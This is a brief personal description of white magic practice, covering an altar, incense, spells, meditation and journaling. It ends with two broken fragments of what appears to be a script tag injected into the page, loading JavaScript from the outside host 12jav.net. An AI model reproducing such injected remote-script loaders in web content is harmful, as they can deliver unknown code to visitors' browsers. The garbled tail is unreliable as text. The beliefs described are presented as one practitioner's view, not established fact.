When contacting a God, Spirit, Ancestor. You want to use the correct amount of energy. Meditation is a good tool to use during magic performances. White magic is centered around an idea that in the universe there is a powerful intelligent being. When I want to cast White magic I use my small table/ Altar, burn incense recite or create a spell then I reflect in my journal about what events happened. Last I meditate. That may be the definition of white magic in the particular system you follow. But the term varies widely in many other traditions as well. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
